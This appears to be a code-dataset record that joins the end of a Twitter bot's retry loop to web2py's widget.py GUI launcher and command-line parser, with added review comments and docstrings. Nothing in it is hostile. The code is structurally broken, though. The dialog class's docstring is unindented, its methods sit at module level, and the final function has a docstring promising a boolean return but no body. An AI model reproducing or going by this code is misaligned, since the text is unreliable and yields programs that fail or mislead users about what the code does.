                twythonaccess.send_tweet(response_tweet, TwitterApp.tweeting)
            except Exception as exception:
                # oh no! an error occured
                # well then. just sleep for sixteen minutes (we have one hour spare), and try once again. if it doesn't work this time, something's severly wrong
                # NOTE(review): the prints below say "twenty minutes" but the
                # sleep is 16*60 seconds — messages and duration disagree.
                print(exception)
                error_messenger.send_error_message(exception, "tweet.py > tweet_loop()")
                print("will sleep for twenty minutes to try to avoid the exception")
                time.sleep(16*60)
                print("has slept for twenty minutes and will retry sending the tweet")
                if self_destruction_flag:
                    break
                try:
                    twythonaccess.send_tweet(response_tweet, TwitterApp.tweeting)
                except Exception as exception2:
                    # no no no no no!
                    # this is not where we want to end up
                    # switch to the backup tweeting app, by setting the twythonaccess backup mode to on
                    # also send an urgency error message, explaining what's happening
                    # NOTE(review): prints `exception`, not `exception2` —
                    # likely a copy-paste slip; same below with exception3.
                    print(exception)
                    print("toggling backup mode in tweeting app")
                    twythonaccess.tweeting_in_backup_mode = not twythonaccess.tweeting_in_backup_mode
                    error_messenger.send_error_message("IMPORTANT: Tweeting app now toggled its backup mode", "tweet.py > tweet_loop()")
                    try:
                        twythonaccess.send_tweet(response_tweet, TwitterApp.tweeting)
                    except Exception as exception3:
                        # i have no idea what to do by now. probably, just shut the whole thing down
                        # we're doomed if we reach this point
                        # goodbye, world
                        print(exception)
                        error_messenger.send_error_message(exception, "tweet.py > tweet_loop()")
                        error_messenger.send_error_message("We're all doomed. Exception couldn't be resolved, even after tremendous effort. Now, ignoring the error.", "tweet.py > tweet_loop()")
            # add the chosen response to the sent responses set
            sent_responses_to_user[user_id].add(response)
            # now, sleep for the specified interval
            time.sleep(tweet_interval)
        # great. all users have been addressed
        # now, sleep until exactly one week has passed since the start time
        while (datetime.utcnow() - start_time).total_seconds() <= 7*24*60*60:
            time.sleep(1)
# if called directly (as in "python3 tweet.py"), then call the main() function
if __name__ == "__main__":
    main()
|
widget.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This file is part of the web2py Web Framework
Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
The widget is called from web2py.
"""
import datetime
import sys
import cStringIO
import time
import thread
import threading
import os
import socket
import signal
import math
import logging
import newcron
import getpass
import gluon.main as main
from gluon.fileutils import read_file, write_file, create_welcome_w2p
from gluon.settings import global_settings
from gluon.shell import run, test
from gluon.utils import is_valid_ip_address, is_loopback_ip_address, getipaddrinfo
# Human-readable program identity strings shown in the GUI and console.
ProgramName = 'web2py Web Framework'
ProgramAuthor = 'Created by Massimo Di Pierro, Copyright 2007-' + str(
    datetime.datetime.now().year)
# The VERSION file lives in the web2py root; read once at import time.
ProgramVersion = read_file('VERSION').strip()
ProgramInfo = '''%s
%s
%s''' % (ProgramName, ProgramAuthor, ProgramVersion)

# This (legacy) web2py only supports CPython 2.5-2.7; warn on anything else.
if not sys.version[:3] in ['2.5', '2.6', '2.7']:
    msg = 'Warning: web2py requires Python 2.5, 2.6 or 2.7 but you are running:\n%s'
    msg = msg % sys.version
    sys.stderr.write(msg)

logger = logging.getLogger("web2py")
def run_system_tests(options):
    """
    Runs unittests for gluon.tests

    Dispatches to ``unit2`` on Python 2.5/2.6 and to ``python -m unittest``
    on 2.7 (optionally under ``coverage`` when ``options.with_coverage`` is
    set). Exits the process: status 1 on test failure, 0 on success.
    """
    import subprocess
    major_version = sys.version_info[0]
    minor_version = sys.version_info[1]
    if major_version == 2:
        if minor_version in (5, 6):
            sys.stderr.write("Python 2.5 or 2.6\n")
            ret = subprocess.call(['unit2', '-v', 'gluon.tests'])
        elif minor_version in (7,):
            call_args = [sys.executable, '-m', 'unittest', '-v', 'gluon.tests']
            if options.with_coverage:
                try:
                    import coverage
                    coverage_config = os.environ.get(
                        "COVERAGE_PROCESS_START",
                        os.path.join('gluon', 'tests', 'coverage.ini'))
                    call_args = ['coverage', 'run', '--rcfile=%s' %
                                 coverage_config,
                                 '-m', 'unittest', '-v', 'gluon.tests']
                except ImportError:
                    # BUGFIX: was a bare `except:`, which also swallowed
                    # KeyboardInterrupt/SystemExit; only a missing coverage
                    # package should trigger the fallback.
                    sys.stderr.write('Coverage was not installed, skipping\n')
            sys.stderr.write("Python 2.7\n")
            ret = subprocess.call(call_args)
        else:
            sys.stderr.write("unknown python 2.x version\n")
            ret = 256
    else:
        sys.stderr.write("Only Python 2.x supported.\n")
        ret = 256
    # collapse any nonzero subprocess status into exit code 1
    sys.exit(ret and 1)
class IO(object):
    """Tee-like stdout wrapper used by the Tk widget.

    Every write is echoed to the real stdout; it is additionally
    forwarded to ``self.callback`` when one has been attached,
    otherwise accumulated in ``self.buffer``.
    """

    def __init__(self):
        """Create the capture buffer."""
        self.buffer = cStringIO.StringIO()

    def write(self, data):
        """Echo *data* to the real stdout, then forward or buffer it."""
        sys.__stdout__.write(data)
        if not hasattr(self, 'callback'):
            self.buffer.write(data)
        else:
            self.callback(data)
def get_url(host, path='/', proto='http', port=80):
    """Build a browsable URL from server parameters.

    IPv6 hosts are bracketed; the wildcard address 0.0.0.0 is rewritten
    to 127.0.0.1; a falsy port or port 80 is omitted from the result.
    """
    host = '[%s]' % host if ':' in host else host.replace('0.0.0.0', '127.0.0.1')
    # strip a single leading slash; the format string re-adds exactly one
    if path[:1] == '/':
        path = path[1:]
    # tolerate a trailing colon on the scheme ("https:" -> "https")
    if proto[-1:] == ':':
        proto = proto[:-1]
    port_part = '' if not port or port == 80 else ':%s' % port
    return '%s://%s%s/%s' % (proto, host, port_part, path)
def start_browser(url, startup=False):
    """Open *url* in the default web browser (best effort).

    When *startup* is true, the URL is printed to the console first.
    Failure to open a browser is non-fatal: a warning is printed.
    """
    if startup:
        print 'please visit:'
        print '\t', url
        print 'starting browser...'
    try:
        import webbrowser
        webbrowser.open(url)
    except:
        # NOTE(review): bare except also hides KeyboardInterrupt/SystemExit;
        # `except Exception` would be safer.
        print 'warning: unable to detect your browser'
class web2pyDialog(object):
""" Main window dialog """
    def __init__(self, root, options):
        """ web2pyDialog constructor

        Builds the whole Tk control window: menus (server / pages /
        scheduler / info), logo and banner areas, IP radio buttons, port
        and password entries, the status canvas and the start/stop
        buttons. With options.taskbar set, the window starts minimized
        to a taskbar icon.
        """
        import Tkinter
        import tkMessageBox

        bg_color = 'white'
        root.withdraw()

        self.root = Tkinter.Toplevel(root, bg=bg_color)
        self.root.resizable(0,0)
        self.root.title(ProgramName)

        self.options = options
        # app name -> multiprocessing.Process of its running scheduler
        self.scheduler_processes = {}
        self.menu = Tkinter.Menu(self.root)
        servermenu = Tkinter.Menu(self.menu, tearoff=0)
        httplog = os.path.join(self.options.folder, 'httpserver.log')
        iconphoto = os.path.join('extras','icons','web2py.gif')
        if os.path.exists(iconphoto):
            img = Tkinter.PhotoImage(file=iconphoto)
            self.root.tk.call('wm', 'iconphoto', self.root._w, img)
        # Building the Menu
        item = lambda: start_browser(httplog)
        servermenu.add_command(label='View httpserver.log',
                               command=item)
        servermenu.add_command(label='Quit (pid:%i)' % os.getpid(),
                               command=self.quit)
        self.menu.add_cascade(label='Server', menu=servermenu)
        self.pagesmenu = Tkinter.Menu(self.menu, tearoff=0)
        self.menu.add_cascade(label='Pages', menu=self.pagesmenu)
        #scheduler menu
        self.schedmenu = Tkinter.Menu(self.menu, tearoff=0)
        self.menu.add_cascade(label='Scheduler', menu=self.schedmenu)
        #start and register schedulers from options
        self.update_schedulers(start=True)
        helpmenu = Tkinter.Menu(self.menu, tearoff=0)
        # Home Page
        item = lambda: start_browser('http://www.web2py.com/')
        helpmenu.add_command(label='Home Page',
                             command=item)
        # About
        item = lambda: tkMessageBox.showinfo('About web2py', ProgramInfo)
        helpmenu.add_command(label='About',
                             command=item)
        self.menu.add_cascade(label='Info', menu=helpmenu)
        self.root.config(menu=self.menu)
        if options.taskbar:
            self.root.protocol('WM_DELETE_WINDOW',
                               lambda: self.quit(True))
        else:
            self.root.protocol('WM_DELETE_WINDOW', self.quit)
        sticky = Tkinter.NW
        # Prepare the logo area
        self.logoarea = Tkinter.Canvas(self.root,
                                       background=bg_color,
                                       width=300,
                                       height=300)
        self.logoarea.grid(row=0, column=0, columnspan=4, sticky=sticky)
        self.logoarea.after(1000, self.update_canvas)
        logo = os.path.join('extras','icons','splashlogo.gif')
        if os.path.exists(logo):
            img = Tkinter.PhotoImage(file=logo)
            pnl = Tkinter.Label(self.logoarea, image=img, background=bg_color, bd=0)
            pnl.pack(side='top', fill='both', expand='yes')
            # Prevent garbage collection of img
            pnl.image = img
        # Prepare the banner area
        self.bannerarea = Tkinter.Canvas(self.root,
                                         bg=bg_color,
                                         width=300,
                                         height=300)
        self.bannerarea.grid(row=1, column=1, columnspan=2, sticky=sticky)
        Tkinter.Label(self.bannerarea, anchor=Tkinter.N,
                      text=str(ProgramVersion + "\n" + ProgramAuthor),
                      font=('Helvetica', 11), justify=Tkinter.CENTER,
                      foreground='#195866', background=bg_color,
                      height=3).pack( side='top',
                                      fill='both',
                                      expand='yes')
        self.bannerarea.after(1000, self.update_canvas)
        # IP
        Tkinter.Label(self.root,
                      text='Server IP:', bg=bg_color,
                      justify=Tkinter.RIGHT).grid(row=4,
                                                  column=1,
                                                  sticky=sticky)
        self.ips = {}
        self.selected_ip = Tkinter.StringVar()
        row = 4
        # loopback first (selected by default), then any user-supplied
        # public IPs, then the wildcard address
        ips = [('127.0.0.1', 'Local (IPv4)')] + \
            ([('::1', 'Local (IPv6)')] if socket.has_ipv6 else []) + \
            [(ip, 'Public') for ip in options.ips] + \
            [('0.0.0.0', 'Public')]
        for ip, legend in ips:
            self.ips[ip] = Tkinter.Radiobutton(
                self.root, bg=bg_color, highlightthickness=0,
                selectcolor='light grey', width=30,
                anchor=Tkinter.W, text='%s (%s)' % (legend, ip),
                justify=Tkinter.LEFT,
                variable=self.selected_ip, value=ip)
            self.ips[ip].grid(row=row, column=2, sticky=sticky)
            if row == 4:
                self.ips[ip].select()
            row += 1
        shift = row
        # Port
        Tkinter.Label(self.root,
                      text='Server Port:', bg=bg_color,
                      justify=Tkinter.RIGHT).grid(row=shift,
                                                  column=1, pady=10,
                                                  sticky=sticky)
        self.port_number = Tkinter.Entry(self.root)
        self.port_number.insert(Tkinter.END, self.options.port)
        self.port_number.grid(row=shift, column=2, sticky=sticky, pady=10)
        # Password
        Tkinter.Label(self.root,
                      text='Choose Password:', bg=bg_color,
                      justify=Tkinter.RIGHT).grid(row=shift + 1,
                                                  column=1,
                                                  sticky=sticky)
        self.password = Tkinter.Entry(self.root, show='*')
        self.password.bind('<Return>', lambda e: self.start())
        self.password.focus_force()
        self.password.grid(row=shift + 1, column=2, sticky=sticky)
        # Prepare the canvas
        self.canvas = Tkinter.Canvas(self.root,
                                     width=400,
                                     height=100,
                                     bg='black')
        self.canvas.grid(row=shift + 2, column=1, columnspan=2, pady=5,
                         sticky=sticky)
        self.canvas.after(1000, self.update_canvas)
        # Prepare the frame
        frame = Tkinter.Frame(self.root)
        frame.grid(row=shift + 3, column=1, columnspan=2, pady=5,
                   sticky=sticky)
        # Start button
        self.button_start = Tkinter.Button(frame,
                                           text='start server',
                                           command=self.start)
        self.button_start.grid(row=0, column=0, sticky=sticky)
        # Stop button
        self.button_stop = Tkinter.Button(frame,
                                          text='stop server',
                                          command=self.stop)
        self.button_stop.grid(row=0, column=1, sticky=sticky)
        self.button_stop.configure(state='disabled')
        if options.taskbar:
            import gluon.contrib.taskbar_widget
            self.tb = gluon.contrib.taskbar_widget.TaskBarIcon()
            self.checkTaskBar()
            if options.password != '<ask>':
                self.password.insert(0, options.password)
                self.start()
                self.root.withdraw()
        else:
            self.tb = None
def update_schedulers(self, start=False):
    """Rebuild the scheduler start/stop menu, optionally starting schedulers.

    Scans applications/ for apps that define models/scheduler.py. When
    *start* is true and both -K (scheduler) and -X (with_scheduler)
    options are set, starts a scheduler for each listed app first.
    """
    apps = []
    available_apps = [arq for arq in os.listdir('applications/')]
    # keep only apps that actually define a scheduler model
    available_apps = [arq for arq in available_apps
                      if os.path.exists(
                          'applications/%s/models/scheduler.py' % arq)]
    if start:
        #the widget takes care of starting the scheduler
        if self.options.scheduler and self.options.with_scheduler:
            apps = [app.strip() for app
                    in self.options.scheduler.split(',')
                    if app in available_apps]
        for app in apps:
            self.try_start_scheduler(app)
    #reset the menu
    self.schedmenu.delete(0, len(available_apps))
    for arq in available_apps:
        if arq not in self.scheduler_processes:
            # bind arq as a default argument to avoid the late-binding
            # closure pitfall inside the loop
            item = lambda u = arq: self.try_start_scheduler(u)
            self.schedmenu.add_command(label="start %s" % arq,
                                       command=item)
        if arq in self.scheduler_processes:
            item = lambda u = arq: self.try_stop_scheduler(u)
            self.schedmenu.add_command(label="stop %s" % arq,
                                       command=item)
def start_schedulers(self, app):
    """Launch a scheduler child process for *app* and register it.

    Runs in a worker thread (see try_start_scheduler). Uses
    multiprocessing.Process so the scheduler loop does not block the GUI.
    """
    try:
        from multiprocessing import Process
    except:
        sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
        return
    # code executed inside the child: run the app's scheduler loop
    code = "from gluon import current;current._scheduler.loop()"
    print 'starting scheduler from widget for "%s"...' % app
    args = (app, True, True, None, False, code)
    logging.getLogger().setLevel(self.options.debuglevel)
    p = Process(target=run, args=args)
    # register before starting so the menu reflects the new process
    self.scheduler_processes[app] = p
    self.update_schedulers()
    print "Currently running %s scheduler processes" % (
        len(self.scheduler_processes))
    p.start()
    print "Processes started"
def try_stop_scheduler(self, app):
    """Terminate and reap the scheduler process registered for *app*, if any."""
    proc = self.scheduler_processes.pop(app, None)
    if proc is None:
        return
    proc.terminate()
    proc.join()
    self.update_schedulers()
def try_start_scheduler(self, app):
    """Spawn a worker thread that starts a scheduler for *app*,
    unless one is already registered."""
    if app in self.scheduler_processes:
        return
    worker = threading.Thread(target=self.start_schedulers, args=(app,))
    worker.start()
def checkTaskBar(self):
    """ Check taskbar status """
    # Poll the taskbar icon's pending-command queue and dispatch the
    # oldest entry; re-schedules itself every second via Tk's event loop.
    if self.tb.status:
        if self.tb.status[0] == self.tb.EnumStatus.QUIT:
            self.quit()
        elif self.tb.status[0] == self.tb.EnumStatus.TOGGLE:
            # show/hide the main window
            if self.root.state() == 'withdrawn':
                self.root.deiconify()
            else:
                self.root.withdraw()
        elif self.tb.status[0] == self.tb.EnumStatus.STOP:
            self.stop()
        elif self.tb.status[0] == self.tb.EnumStatus.START:
            self.start()
        elif self.tb.status[0] == self.tb.EnumStatus.RESTART:
            self.stop()
            self.start()
        # consume the processed command
        del self.tb.status[0]
    self.root.after(1000, self.checkTaskBar)
def update(self, text):
    """Append *text* to the (read-only) console widget.

    The widget is temporarily made writable, written to, then locked
    again so the user cannot edit the log.
    """
    try:
        self.text.configure(state='normal')
        self.text.insert('end', text)
        self.text.configure(state='disabled')
    except:
        pass # ## this should only happen in case app is destroyed
def connect_pages(self):
    """Rebuild the pages menu with one browser-opening entry per app."""
    # an installed app is any applications/ subdir with an __init__.py
    installed = []
    for name in os.listdir('applications/'):
        if os.path.exists('applications/%s/__init__.py' % name):
            installed.append(name)
    # clear the previous entries, then add one command per application;
    # bind the url as a default argument to avoid late-binding closures
    self.pagesmenu.delete(0, len(installed))
    for name in installed:
        app_url = self.url + name
        self.pagesmenu.add_command(
            label=app_url, command=lambda u=app_url: start_browser(u))
def quit(self, justHide=False):
    """ Finish the program execution """
    # When justHide is true the window is only withdrawn (used by the
    # taskbar mode); otherwise everything is torn down and the process
    # exits. Each shutdown step is best-effort: a failure in one must
    # not prevent the following steps from running.
    if justHide:
        self.root.withdraw()
    else:
        try:
            # stop every scheduler child process we started
            scheds = self.scheduler_processes.keys()
            for t in scheds:
                self.try_stop_scheduler(t)
        except:
            pass
        try:
            newcron.stopcron()
        except:
            pass
        try:
            self.server.stop()
        except:
            pass
        try:
            self.tb.Destroy()
        except:
            pass
        self.root.destroy()
        sys.exit(0)
def error(self, message):
    """Show *message* in a modal error dialog.

    tkMessageBox (Python 2 Tk API) is imported lazily so non-GUI code
    paths never require it.
    """
    import tkMessageBox
    tkMessageBox.showerror('web2py start server', message)
def start(self):
    """Start the web2py HTTP server with the values from the GUI form.

    Validates ip/port, builds the HttpServer, runs it on a background
    thread, then locks the form fields while the server is running.
    """
    password = self.password.get()
    if not password:
        # deliberately continues: the server runs, just without the
        # web admin interface
        self.error('no password, no web admin interface')
    ip = self.selected_ip.get()
    if not is_valid_ip_address(ip):
        return self.error('invalid host ip address')
    try:
        port = int(self.port_number.get())
    except:
        return self.error('invalid port number')
    # Check for non default value for ssl inputs
    if (len(self.options.ssl_certificate) > 0 or
            len(self.options.ssl_private_key) > 0):
        proto = 'https'
    else:
        proto = 'http'
    self.url = get_url(ip, proto=proto, port=port)
    self.connect_pages()
    self.button_start.configure(state='disabled')
    try:
        options = self.options
        req_queue_size = options.request_queue_size
        self.server = main.HttpServer(
            ip,
            port,
            password,
            pid_filename=options.pid_filename,
            log_filename=options.log_filename,
            profiler_dir=options.profiler_dir,
            ssl_certificate=options.ssl_certificate,
            ssl_private_key=options.ssl_private_key,
            ssl_ca_certificate=options.ssl_ca_certificate,
            min_threads=options.minthreads,
            max_threads=options.maxthreads,
            server_name=options.server_name,
            request_queue_size=req_queue_size,
            timeout=options.timeout,
            shutdown_timeout=options.shutdown_timeout,
            path=options.folder,
            interfaces=options.interfaces)
        # run the server loop off the GUI thread (Python 2 'thread' module)
        thread.start_new_thread(self.server.start, ())
    except Exception, e:
        self.button_start.configure(state='normal')
        return self.error(str(e))
    if not self.server_ready():
        self.button_start.configure(state='normal')
        return
    self.button_stop.configure(state='normal')
    if not options.taskbar:
        thread.start_new_thread(
            start_browser, (get_url(ip, proto=proto, port=port), True))
    # lock the form while running; NOTE: the comprehension's `ip` shadows
    # the ip string above, but ip is not used afterwards
    self.password.configure(state='readonly')
    [ip.configure(state='disabled') for ip in self.ips.values()]
    self.port_number.configure(state='readonly')
    if self.tb:
        self.tb.SetServerRunning()
def server_ready(self):
    """Return True when at least one server listener reports ready."""
    return any(listener.ready for listener in self.server.server.listeners)
def stop(self):
    """ Stop web2py server """
    # Re-enable the form fields, stop the HTTP server, and update the
    # taskbar icon if one exists.
    self.button_start.configure(state='normal')
    self.button_stop.configure(state='disabled')
    self.password.configure(state='normal')
    # unlock every ip radio button (ip here is a Radiobutton widget)
    [ip.configure(state='normal') for ip in self.ips.values()]
    self.port_number.configure(state='normal')
    self.server.stop()
    if self.tb:
        self.tb.SetServerStopped()
def update_canvas(self):
    """Redraw the activity graph from httpserver.log growth, once per second.

    self.t0 is the last-read log offset, self.p0 the list of y values,
    self.q0 the canvas line items. The except branch (re)initializes
    that state on first run or on any drawing error.
    """
    try:
        t1 = os.path.getsize('httpserver.log')
    except:
        # log not available yet: just try again in a second
        self.canvas.after(1000, self.update_canvas)
        return
    try:
        fp = open('httpserver.log', 'r')
        fp.seek(self.t0)
        data = fp.read(t1 - self.t0)
        fp.close()
        # shift the graph left and append a point derived from the
        # number of new log lines (more lines -> lower value)
        value = self.p0[1:] + [10 + 90.0 / math.sqrt(1 + data.count('\n'))]
        self.p0 = value
        for i in xrange(len(self.p0) - 1):
            c = self.canvas.coords(self.q0[i])
            self.canvas.coords(self.q0[i],
                               (c[0],
                                self.p0[i],
                                c[2],
                                self.p0[i + 1]))
        self.t0 = t1
    except BaseException:
        # (re)initialize graph state
        # NOTE(review): self.t0 = time.time() is immediately overwritten
        # by self.t0 = t1 on the next line; the first assignment looks
        # like dead code — confirm intent before removing
        self.t0 = time.time()
        self.t0 = t1
        self.p0 = [100] * 400
        self.q0 = [self.canvas.create_line(i, 100, i + 1, 100,
                                           fill='green')
                   for i in xrange(len(self.p0) - 1)]
    self.canvas.after(1000, self.update_canvas)
def console():
    """Parse web2py's command line and return (options, args).

    Builds the optparse parser for every supported flag, strips any
    trailing "-A/--args ..." tail into options.args, resolves the
    machine's non-loopback IPs into options.ips, normalizes the
    --interfaces and --scheduler option formats, and performs a few
    startup side effects (quiet mode, cronjob mode, welcome app).
    """
    import optparse
    import textwrap

    usage = "python web2py.py"
    description = """\
    web2py Web Framework startup script.
    ATTENTION: unless a password is specified (-a 'passwd') web2py will
    attempt to run a GUI. In this case command line options are ignored."""
    description = textwrap.dedent(description)
    parser = optparse.OptionParser(
        usage, None, optparse.Option, ProgramVersion)
    parser.description = description

    # -- server address / credentials ----------------------------------
    msg = ('IP address of the server (e.g., 127.0.0.1 or ::1); '
           'Note: This value is ignored when using the \'interfaces\' option.')
    parser.add_option('-i',
                      '--ip',
                      default='127.0.0.1',
                      dest='ip',
                      help=msg)
    parser.add_option('-p',
                      '--port',
                      default='8000',
                      dest='port',
                      type='int',
                      help='port of server (8000)')
    msg = ('password to be used for administration '
           '(use -a "<recycle>" to reuse the last password))')
    parser.add_option('-a',
                      '--password',
                      default='<ask>',
                      dest='password',
                      help=msg)

    # -- SSL -----------------------------------------------------------
    parser.add_option('-c',
                      '--ssl_certificate',
                      default='',
                      dest='ssl_certificate',
                      help='file that contains ssl certificate')
    parser.add_option('-k',
                      '--ssl_private_key',
                      default='',
                      dest='ssl_private_key',
                      help='file that contains ssl private key')
    msg = ('Use this file containing the CA certificate to validate X509 '
           'certificates from clients')
    parser.add_option('--ca-cert',
                      action='store',
                      dest='ssl_ca_certificate',
                      default=None,
                      help=msg)

    # -- server process / logging --------------------------------------
    parser.add_option('-d',
                      '--pid_filename',
                      default='httpserver.pid',
                      dest='pid_filename',
                      help='file to store the pid of the server')
    parser.add_option('-l',
                      '--log_filename',
                      default='httpserver.log',
                      dest='log_filename',
                      help='file to log connections')
    parser.add_option('-n',
                      '--numthreads',
                      default=None,
                      type='int',
                      dest='numthreads',
                      help='number of threads (deprecated)')
    parser.add_option('--minthreads',
                      default=None,
                      type='int',
                      dest='minthreads',
                      help='minimum number of server threads')
    parser.add_option('--maxthreads',
                      default=None,
                      type='int',
                      dest='maxthreads',
                      help='maximum number of server threads')
    parser.add_option('-s',
                      '--server_name',
                      default=socket.gethostname(),
                      dest='server_name',
                      help='server name for the web server')
    msg = 'max number of queued requests when server unavailable'
    parser.add_option('-q',
                      '--request_queue_size',
                      default='5',
                      type='int',
                      dest='request_queue_size',
                      help=msg)
    parser.add_option('-o',
                      '--timeout',
                      default='10',
                      type='int',
                      dest='timeout',
                      help='timeout for individual request (10 seconds)')
    parser.add_option('-z',
                      '--shutdown_timeout',
                      default='5',
                      type='int',
                      dest='shutdown_timeout',
                      help='timeout on shutdown of server (5 seconds)')
    parser.add_option('--socket-timeout',
                      default=5,
                      type='int',
                      dest='socket_timeout',
                      help='timeout for socket (5 second)')
    parser.add_option('-f',
                      '--folder',
                      default=os.getcwd(),
                      dest='folder',
                      help='folder from which to run web2py')
    parser.add_option('-v',
                      '--verbose',
                      action='store_true',
                      dest='verbose',
                      default=False,
                      help='increase --test verbosity')
    parser.add_option('-Q',
                      '--quiet',
                      action='store_true',
                      dest='quiet',
                      default=False,
                      help='disable all output')
    msg = ('set debug output level (0-100, 0 means all, 100 means none; '
           'default is 30)')
    parser.add_option('-D',
                      '--debug',
                      dest='debuglevel',
                      default=30,
                      type='int',
                      help=msg)

    # -- shell / scripting ---------------------------------------------
    msg = ('run web2py in interactive shell or IPython (if installed) with '
           'specified appname (if app does not exist it will be created). '
           'APPNAME like a/c/f (c,f optional)')
    parser.add_option('-S',
                      '--shell',
                      dest='shell',
                      metavar='APPNAME',
                      help=msg)
    msg = ('run web2py in interactive shell or bpython (if installed) with '
           'specified appname (if app does not exist it will be created).\n'
           'Use combined with --shell')
    parser.add_option('-B',
                      '--bpython',
                      action='store_true',
                      default=False,
                      dest='bpython',
                      help=msg)
    msg = 'only use plain python shell; should be used with --shell option'
    parser.add_option('-P',
                      '--plain',
                      action='store_true',
                      default=False,
                      dest='plain',
                      help=msg)
    msg = ('auto import model files; default is False; should be used '
           'with --shell option')
    parser.add_option('-M',
                      '--import_models',
                      action='store_true',
                      default=False,
                      dest='import_models',
                      help=msg)
    msg = ('run PYTHON_FILE in web2py environment; '
           'should be used with --shell option')
    parser.add_option('-R',
                      '--run',
                      dest='run',
                      metavar='PYTHON_FILE',
                      default='',
                      help=msg)

    # -- scheduler / cron ----------------------------------------------
    msg = ('run scheduled tasks for the specified apps: expects a list of '
           'app names as -K app1,app2,app3 '
           'or a list of app:groups as -K app1:group1:group2,app2:group1 '
           'to override specific group_names. (only strings, no spaces '
           'allowed. Requires a scheduler defined in the models')
    parser.add_option('-K',
                      '--scheduler',
                      dest='scheduler',
                      default=None,
                      help=msg)
    msg = 'run schedulers alongside webserver, needs -K app1 and -a too'
    parser.add_option('-X',
                      '--with-scheduler',
                      action='store_true',
                      default=False,
                      dest='with_scheduler',
                      help=msg)
    msg = ('run doctests in web2py environment; '
           'TEST_PATH like a/c/f (c,f optional)')
    parser.add_option('-T',
                      '--test',
                      dest='test',
                      metavar='TEST_PATH',
                      default=None,
                      help=msg)
    msg = 'trigger a cron run manually; usually invoked from a system crontab'
    parser.add_option('-C',
                      '--cron',
                      action='store_true',
                      dest='extcron',
                      default=False,
                      help=msg)
    msg = 'triggers the use of softcron'
    parser.add_option('--softcron',
                      action='store_true',
                      dest='softcron',
                      default=False,
                      help=msg)
    parser.add_option('-Y',
                      '--run-cron',
                      action='store_true',
                      dest='runcron',
                      default=False,
                      help='start the background cron process')
    parser.add_option('-J',
                      '--cronjob',
                      action='store_true',
                      dest='cronjob',
                      default=False,
                      help='identify cron-initiated command')

    # -- misc ----------------------------------------------------------
    parser.add_option('-L',
                      '--config',
                      dest='config',
                      default='',
                      help='config file')
    parser.add_option('-F',
                      '--profiler',
                      dest='profiler_dir',
                      default=None,
                      help='profiler dir')
    parser.add_option('-t',
                      '--taskbar',
                      action='store_true',
                      dest='taskbar',
                      default=False,
                      help='use web2py gui and run in taskbar (system tray)')
    parser.add_option('',
                      '--nogui',
                      action='store_true',
                      default=False,
                      dest='nogui',
                      help='text-only, no GUI')
    msg = ('should be followed by a list of arguments to be passed to script, '
           'to be used with -S, -A must be the last option')
    parser.add_option('-A',
                      '--args',
                      action='store',
                      dest='args',
                      default=None,
                      help=msg)
    parser.add_option('--no-banner',
                      action='store_true',
                      default=False,
                      dest='nobanner',
                      help='Do not print header banner')
    msg = ('listen on multiple addresses: '
           '"ip1:port1:key1:cert1:ca_cert1;ip2:port2:key2:cert2:ca_cert2;..." '
           '(:key:cert:ca_cert optional; no spaces; IPv6 addresses must be in '
           'square [] brackets)')
    parser.add_option('--interfaces',
                      action='store',
                      dest='interfaces',
                      default=None,
                      help=msg)
    msg = 'runs web2py tests'
    parser.add_option('--run_system_tests',
                      action='store_true',
                      dest='run_system_tests',
                      default=False,
                      help=msg)
    msg = ('adds coverage reporting (needs --run_system_tests), '
           'python 2.7 and the coverage module installed. '
           'You can alter the default path setting the environmental '
           'var "COVERAGE_PROCESS_START". '
           'By default it takes gluon/tests/coverage.ini')
    parser.add_option('--with_coverage',
                      action='store_true',
                      dest='with_coverage',
                      default=False,
                      help=msg)

    # Everything after -A/--args belongs to the user's script, not to
    # web2py: split it off before parsing.
    if '-A' in sys.argv:
        k = sys.argv.index('-A')
    elif '--args' in sys.argv:
        k = sys.argv.index('--args')
    else:
        k = len(sys.argv)
    sys.argv, other_args = sys.argv[:k], sys.argv[k + 1:]
    (options, args) = parser.parse_args()
    options.args = [options.run] + other_args
    global_settings.cmd_options = options
    global_settings.cmd_args = args

    # resolve the machine's non-loopback IP addresses for the GUI list
    try:
        options.ips = list(set( # no duplicates
            [addrinfo[4][0] for addrinfo in getipaddrinfo(socket.getfqdn())
             if not is_loopback_ip_address(addrinfo=addrinfo)]))
    except socket.gaierror:
        options.ips = []

    if options.run_system_tests:
        run_system_tests(options)

    if options.quiet:
        # swallow stdout and effectively silence the logger
        capture = cStringIO.StringIO()
        sys.stdout = capture
        logger.setLevel(logging.CRITICAL + 1)
    else:
        logger.setLevel(options.debuglevel)

    # -L accepts "config.py" or "config": normalize to the module name
    if options.config[-3:] == '.py':
        options.config = options.config[:-3]

    if options.cronjob:
        global_settings.cronjob = True  # tell the world
        options.plain = True  # cronjobs use a plain shell
        options.nobanner = True
        options.nogui = True

    options.folder = os.path.abspath(options.folder)

    # accept --interfaces in the form
    # "ip1:port1:key1:cert1:ca_cert1;[ip2]:port2;ip3:port3:key3:cert3"
    # (no spaces; optional key:cert indicate SSL)
    if isinstance(options.interfaces, str):
        interfaces = options.interfaces.split(';')
        options.interfaces = []
        for interface in interfaces:
            if interface.startswith('['):  # IPv6
                ip, if_remainder = interface.split(']', 1)
                ip = ip[1:]
                if_remainder = if_remainder[1:].split(':')
                if_remainder[0] = int(if_remainder[0])  # numeric port
                options.interfaces.append(tuple([ip] + if_remainder))
            else:  # IPv4
                interface = interface.split(':')
                interface[1] = int(interface[1])  # numeric port
                options.interfaces.append(tuple(interface))

    # accepts --scheduler in the form
    # "app:group1,group2,app2:group1"
    scheduler = []
    options.scheduler_groups = None
    if isinstance(options.scheduler, str):
        if ':' in options.scheduler:
            for opt in options.scheduler.split(','):
                scheduler.append(opt.split(':'))
            options.scheduler = ','.join([app[0] for app in scheduler])
            options.scheduler_groups = scheduler

    if options.numthreads is not None and options.minthreads is None:
        options.minthreads = options.numthreads  # legacy

    create_welcome_w2p()

    if not options.cronjob:
        # If we have the applications package or if we should upgrade
        if not os.path.exists('applications/__init__.py'):
            write_file('applications/__init__.py', '')

    return options, args
def check_existent_app(options, appname):
    """Return True if *appname* is installed under options.folder.

    An app is considered installed when the directory
    ``<options.folder>/applications/<appname>`` exists.

    The original fell through and implicitly returned None for missing
    apps, relying on truthiness at every call site; returning an explicit
    bool is backward-compatible (None and False are both falsy) and
    makes the contract clear.
    """
